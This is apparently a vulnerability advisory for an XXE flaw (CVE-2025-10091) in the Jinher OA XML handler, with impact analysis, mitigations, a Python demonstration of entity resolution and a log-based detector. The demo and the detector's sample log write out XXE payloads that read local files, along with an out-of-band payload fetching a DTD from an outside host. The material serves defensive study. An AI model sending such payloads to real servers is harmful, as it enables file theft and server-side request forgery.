CVE-2025-10091: XML External Entity Reference in Jinher OA
A vulnerability has been found in Jinher OA up to and including version 1.2. It affects an unknown function of the file /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx/?Type=add in the component XML Handler. Manipulation of the XML input leads to an XML external entity reference. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
AI Analysis
Technical Summary
CVE-2025-10091 is an XML External Entity (XXE) vulnerability in Jinher OA versions up to and including 1.2. It affects the XML handler reached at /c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx/?Type=add; the advisory does not identify the function inside that handler. XXE arises when an XML parser honours a DOCTYPE in untrusted input and resolves the external entities it declares: the attacker submits a document whose DTD declares an entity with a SYSTEM identifier (a local file path or a URL), references that entity in element content, and then either reads back what the parser fetched or simply benefits from the server having fetched a URL on the attacker's behalf. Here the untrusted XML is the request body posted to the handler. The .aspx extension indicates an ASP.NET page, so the parser is most likely System.Xml; whether it resolves external entities depends on the XmlResolver and DtdProcessing settings the vendor's code uses, which the advisory does not state. The CVSS 4.0 base score is 6.9 (Medium). The vector rates the attack as reachable over the network (AV:N), requiring no privileges (PR:N) and no user interaction (UI:N), with low impact on the confidentiality, integrity and availability of the vulnerable system (VC:L, VI:L, VA:L); CVSS 4.0 has no scope metric, and the 3.x notion of "no scope change" corresponds to the subsequent-system impact metrics being rated none. Some data disclosure, modification or service disruption is therefore expected, but not a full compromise from this issue alone. The exploit has been publicly disclosed; no exploitation in the wild had been reported at the time of writing, but a public exploit lowers the bar for opportunistic attacks. No patch link is recorded, so a vendor fix may not yet be available or announced. Jinher OA is an office automation product used to run organisational workflows and projects, so a compromised instance exposes internal business data and, through XXE, the server's filesystem and internal network.
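The entity-resolution behaviour described above, shown as an added example in Python rather than in the vendor's ASP.NET code (which the advisory does not reproduce): the same constructed request body is parsed once by a parser that is allowed to resolve external general entities and once by a hardened parser that is not. The element names (project, projectName) are hypothetical, since the schema expected by XmlHttp.aspx is not given; the "secret" file is created by the script itself.

```python
"""XXE mechanics behind CVE-2025-10091 (added illustration, not vendor code).

A DOCTYPE in the request body declares an external general entity whose
SYSTEM identifier points at a local file. A parser that resolves external
entities splices the file content into the element text; a parser with
external entity resolution disabled drops the reference instead.
"""
import io
import os
import tempfile
import xml.sax
from typing import Tuple
from xml.sax import handler


class _TextCollector(handler.ContentHandler):
    """Collects the character data inside the (hypothetical) projectName element."""

    def __init__(self) -> None:
        super().__init__()
        self.parts = []
        self._inside = False

    def startElement(self, name, attrs):
        if name == "projectName":
            self._inside = True

    def endElement(self, name):
        if name == "projectName":
            self._inside = False

    def characters(self, content):
        if self._inside:
            self.parts.append(content)


def build_xxe_payload(target_path: str) -> bytes:
    """Constructed sample request body (element names are assumptions)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!DOCTYPE project [\n"
        f'  <!ENTITY xxe SYSTEM "file://{target_path}">\n'
        "]>\n"
        "<project><projectName>&xxe;</projectName></project>"
    ).encode("utf-8")


def parse_project_name(body: bytes, resolve_external_entities: bool) -> str:
    """Parse the body with xml.sax (expat).

    resolve_external_entities=True reproduces a vulnerable handler: expat calls
    back into xml.sax for the SYSTEM entity, which opens the file (or URL) and
    parses its content as element text. False is the hardened setting: the
    reference is skipped and contributes no text.
    """
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, resolve_external_entities)
    collector = _TextCollector()
    parser.setContentHandler(collector)
    parser.parse(io.BytesIO(body))
    return "".join(collector.parts)


def demo() -> Tuple[str, str]:
    """Create a throwaway secret file, then parse the same payload both ways.

    Returns (vulnerable_result, hardened_result).
    """
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("db_password=hunter2")  # constructed secret, not real data
        secret_path = fh.name
    try:
        payload = build_xxe_payload(secret_path)
        leaked = parse_project_name(payload, resolve_external_entities=True)
        safe = parse_project_name(payload, resolve_external_entities=False)
    finally:
        os.unlink(secret_path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(safe))
```

The SYSTEM identifier is resolved through urllib, so the same vulnerable configuration also turns the parser into an SSRF primitive when the identifier is an http:// URL; the hardened branch is the setting every parser in front of untrusted XML needs, whatever the language.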
Potential Impact
For European organizations running Jinher OA (any release up to and including 1.2), the immediate risk is unauthorized read access to the server and disruption of the project-management workflow that the affected handler serves. A successful XXE lets an attacker read files the application process can open (configuration files, connection strings, other users' data), make the server issue requests to internal hosts (server-side request forgery, which reaches services that are not exposed externally), or exhaust the parser through recursive entity expansion or by pointing an entity at a resource that never answers. Leaked business records, intellectual property or personal data fall under GDPR, with the associated notification duties, penalties and reputational cost. Because the attack is remote and, per the advisory, unauthenticated, any instance whose handler is reachable from the internet or from a large internal network is exposed. An office automation system is also a convenient foothold: credentials or internal hostnames read through XXE can be used to move laterally toward file servers, directories or databases. The medium rating reflects limited per-request impact, not low likelihood; the issue should be fixed or mitigated promptly before it is chained with other weaknesses.
Mitigation Recommendations
1. Restrict access to the vulnerable handler (/c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx) at the network edge: keep the OA instance off the public internet, or front it with a reverse proxy, VPN or allow-list so that only the user population that needs project management can reach it.
2. Where a reverse proxy or WAF sits in front of the application, reject request bodies to this endpoint that contain a DOCTYPE or ENTITY declaration; a legitimate client of the handler has no reason to send a DTD. Inspect the decoded body rather than the raw bytes, since URL-encoding, UTF-16 and parameter entities are routinely used to evade string matching, and treat the WAF rule as a stopgap rather than a fix.
3. The real fix is to disable DTD processing in the parser. The handler is an ASP.NET page, so the parser is almost certainly System.Xml; if the parser settings are exposed in configuration, set DtdProcessing to Prohibit (or the XmlResolver to null) and confirm the change with a test request carrying a harmless SYSTEM entity. If they are not exposed, this becomes the requirement for the vendor patch.
4. Monitor for exploitation: log request bodies (or at least body sizes and hashes) for this endpoint, alert on DOCTYPE, ENTITY, SYSTEM and PUBLIC keywords and on parameter entity references, and watch egress from the OA server for outbound HTTP, FTP or DNS to unfamiliar hosts, which is how out-of-band XXE exfiltrates data even when the response never echoes the entity.
5. Ask the vendor for a fixed build and track the advisory for patch links; until one exists, the measures above are the only protection.
6. Inventory every Jinher OA deployment and record its version; all releases up to and including 1.2 are in scope.
7. Brief administrators and the security team on XXE and on secure XML parsing: DTDs disabled, external entities never resolved, and parsers fed only the encodings and schemas the application expects.
8. Run the OA application pool under a low-privilege service account with a minimal filesystem view, so that an XXE file read that does succeed cannot reach credentials or configuration outside the application directory.
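A concrete version of the monitoring item above, as an added example that is not part of the advisory: a scanner over constructed JSON request logs (assumed to come from a reverse proxy that records the request path and body) that scopes the rule to the affected endpoint, undoes the cheap encodings attackers use against naive signatures, and reports which XXE indicators each request triggered. Client addresses and the non-matching path in the sample are placeholders.

```python
"""Request-log detection for XXE attempts against the Jinher OA XML handler.

Added example, not from the advisory. Assumes a reverse proxy or WAF that
writes one JSON object per request with "src", "path", "query" and "body"
fields; the log lines at the bottom are constructed for this demo.
"""
import json
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Endpoint named in the advisory. IIS paths are case-insensitive, so match
# case-insensitively and tolerate a trailing slash to avoid trivial evasion.
TARGET_PATH = re.compile(
    r"^/c6/Jhsoft\.Web\.projectmanage/ProjectManage/XmlHttp\.aspx/?$",
    re.IGNORECASE,
)

# Indicators of DTD abuse, checked in this order. A normal client of the
# handler never sends a DOCTYPE, so the first hit alone justifies an alert.
INDICATORS = [
    ("doctype_declaration", re.compile(r"<!\s*DOCTYPE", re.IGNORECASE)),
    ("entity_declaration", re.compile(r"<!\s*ENTITY", re.IGNORECASE)),
    ("external_identifier", re.compile(r"\b(SYSTEM|PUBLIC)\s+[\"']", re.IGNORECASE)),
    ("parameter_entity_ref", re.compile(r"%[A-Za-z_][\w.-]*;")),
    ("file_or_network_uri",
     re.compile(r"\b(file|http|https|ftp|gopher|jar|php|expect)://", re.IGNORECASE)),
]


def normalise_body(raw: str) -> str:
    """Undo percent-encoding (applied up to twice), HTML-escaped angle brackets
    and NUL bytes left over from UTF-16 payloads before signature matching."""
    text = raw
    for _ in range(2):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text.replace("&lt;", "<").replace("&gt;", ">").replace("\x00", "")


def analyse_request(entry: Dict[str, str]) -> List[str]:
    """Return the names of the indicators present in one request, or [] when
    the request is not for the affected endpoint or looks benign."""
    if not TARGET_PATH.match(entry.get("path", "")):
        return []
    body = normalise_body(entry.get("body", ""))
    return [name for name, pattern in INDICATORS if pattern.search(body)]


def scan_log(lines: List[str]) -> List[Dict[str, object]]:
    """Parse JSON log lines and collect one alert per suspicious request."""
    alerts = []
    for line in lines:
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # malformed line; a production pipeline would count these
        hits = analyse_request(entry)
        if hits:
            alerts.append({"src": entry.get("src"), "path": entry["path"], "indicators": hits})
    return alerts


# Constructed sample log: one benign request, a textbook file-read payload,
# a URL-encoded out-of-band payload against a lowercased path, and a DOCTYPE
# sent to an unrelated placeholder path that the rule must ignore.
SAMPLE_LOG = [json.dumps(e) for e in [
    {"src": "198.51.100.10", "path": "/c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx",
     "query": "Type=add", "body": "<project><name>Q4 rollout</name></project>"},
    {"src": "203.0.113.7", "path": "/c6/Jhsoft.Web.projectmanage/ProjectManage/XmlHttp.aspx",
     "query": "Type=add",
     "body": '<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>'
             "<project><name>&xxe;</name></project>"},
    {"src": "203.0.113.9", "path": "/c6/jhsoft.web.projectmanage/projectmanage/xmlhttp.aspx/",
     "query": "type=add",
     "body": "%3C%21DOCTYPE%20a%20%5B%3C%21ENTITY%20%25%20dtd%20SYSTEM%20%22http%3A%2F%2F"
             "203.0.113.5%2Fx.dtd%22%3E%25dtd%3B%5D%3E%3Cproject%2F%3E"},
    {"src": "198.51.100.11", "path": "/c6/SomeOtherHandler.aspx", "query": "",
     "body": "<!DOCTYPE x [<!ENTITY e SYSTEM \"file:///etc/passwd\">]><x>&e;</x>"},
]]


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

The third sample is the out-of-band variant: a parameter entity fetches an attacker-hosted DTD, so the stolen data leaves in the server's own outbound request rather than in the HTTP response. That is why the request-side indicators here should be paired with egress monitoring on the OA host; and because this normaliser does not transcode UTF-16 or UTF-7 bodies, a WAF built on it remains a stopgap, not a substitute for disabling DTDs in the parser.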
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium, Sweden, Austria
Technical Details
- Data Version: 5.1
- Assigner Short Name: VulDB
- Date Reserved: 2025-09-08T04:57:59.525Z
- CVSS Version: 4.0
- State: PUBLISHED
Threat ID: 68bebb05d5a2966cfc7edfea
Added to database: 9/8/2025, 11:16:21 AM
Last enriched: 9/8/2025, 11:31:24 AM
Last updated: 9/8/2025, 4:01:41 PM
Related Threats
- CVE-2025-10097: Code Injection in SimStudioAI sim (Medium)
- CVE-2025-51586: n/a (High)
- CVE-2025-10096: Server-Side Request Forgery in SimStudioAI sim (Medium)
- CVE-2025-59033: n/a (High)
- CVE-2025-55998: n/a (High)